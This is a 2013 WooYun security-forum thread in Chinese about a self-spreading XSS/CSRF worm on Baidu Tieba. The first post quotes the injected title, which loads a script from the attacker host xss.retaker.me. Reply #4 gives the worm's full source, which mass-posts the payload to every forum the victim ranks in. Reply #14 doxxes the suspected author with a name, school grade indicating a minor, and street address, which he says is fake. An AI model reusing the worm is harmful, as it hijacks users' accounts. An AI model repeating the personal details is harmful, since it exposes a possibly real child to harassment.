在贴吧被csrf了

  • A+
所属分类:WooYun-Zone

在贴吧被csrf了

点进来有..”,a:$.getScript(‘//xss.retaker.me/1.js’),a:”

题目都是这样的

本来以为是某个人测试的呢  点开想回复一个  我的cookies到你那了么

结果就发现自己的账号也发出了相似的帖子。。。

  1. 1#

    穿精带淫 | 2013-05-19 17:32

    看到了,很多贴吧都有这帖.

  2. 2#

    momo | 2013-05-19 17:33

    1111

  3. 3#

    书生 (WooYun(白帽子技术社区)) | 2013-05-19 17:34

    我勒个去,“我喜欢的贴吧”都会转发这条信息

  4. 4#

    erevus | 2013-05-19 17:46

    var forumName = [];

    var forumId = [];

    for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) {

      if (PageData.user.user_forum_list.info[i].user_level > 3) {

        if (PageData.user.user_forum_list.info[i].forum_name!="璐村惂鐩戞帶") {

          forumName[j] = PageData.user.user_forum_list.info[i].forum_name;

          forumId[j] = PageData.user.user_forum_list.info[i].id;

          j++;

        }

      }

    }

    function madeit(myKw, myFid) {

      var c = rich_postor._getData();

      c.content="\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01";

      c.ftid = c.fid;

      c.ptid = "2337372175";

      c.title = '\\u70b9\\u8fdb\\u6765\\u6709..",a:$.getScript(\\'//xss.retaker.me/1.js\\'),a:"';

      c.fid = myFid;

      c.kw = myKw;

      $.post("/relay/commit", c);

    }

    //now begin!

    for (j = 0; j < forumName.length; j++) {

      setTimeout("madeit('" + forumName[j] + "','" + forumId[j] + "')", 1500 * j);

    }

  5. 5#

    z7y (小胖子首席鉴黄师) | 2013-05-19 18:03

    哈哈哈哈哈,好玩儿~

  6. 6#

    呆子不开口 (求各种兼职) | 2013-05-19 18:14

    为何说是csrf

  7. 7#

    liyang (<script>alert(“xss”)</script>) | 2013-05-19 18:16

    @呆子不开口 要不是什么啊~~

  8. 8#

    asdf (import pdb;pdb.set_trace(); name=”signature” type=”text” maxlength=”25″) | 2013-05-19 19:57

    DOM XSS WORM http://weibo.com/1652595727/zxsFJ60bn
    csrf方式来提交表单而已,但应该认为是XSS

  9. 9#

    liyang (<script>alert(“xss”)</script>) | 2013-05-19 20:24

    @asdf 额~~我是菜鸟~~我一直认为的是xss和csrf是一类的 怎么区分呢~~xss只是窃取用户cookies等,而csrf是借助用户权限干别的事情~~

  10. 10#

    猥琐 (http://blog.twodong.com) | 2013-05-19 20:39

    因为这个好多人被封了

  11. 11#

    海盗湾V | 2013-05-19 20:47

    乌云白帽子干的http://www.wooyun.org/whitehats/retaker

  12. 12#

    liyang (<script>alert(“xss”)</script>) | 2013-05-19 20:53

    @海盗湾V 我在网上搜了搜他百度账号 面包虫007  貌似之前也干过这事http://tieba.baidu.com/p/2204216052

  13. 13#
    感谢(1)

    梧桐雨 | 2013-05-19 20:57

    @liyang csrf和xss是不一样的。虽然都属于前端hack

  14. 14#

    海盗湾V | 2013-05-19 21:27

    @liyang 面包虫007 ,真实姓名:王竟宇
    年级,初一 地址:济南章丘双山小区4栋17号
    真的假的?

  15. 15#

    erevus | 2013-05-19 23:00

    @海盗湾V 不是他首发的

  16. 16#

    retaker | 2013-05-20 08:47

    @dtc 求解救………………

  17. 17#

    retaker | 2013-05-20 08:49

    @海盗湾V 当然是假的

  18. 18#

    齐迹 (sec.zbj.com 欢迎来撸) | 2013-05-20 08:56

    LZ 你的马赛克为什么不全打呢?

  19. 19#

    liyang (<script>alert(“xss”)</script>) | 2013-05-20 11:21

    @齐迹 那其实就是我的账号,有哪里漏了么~

  20. 20#

    半世倾尘 | 2013-05-20 12:19

    比较牛逼

  21. 21#

    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2013-05-20 18:00

    这个虫子的行为是:一个用户中招后,就会在所有该用户收藏的贴吧中发帖。

  22. 22#

    冉冉升起 (….ing) | 2013-05-24 21:47

    看不来csrf想学啊!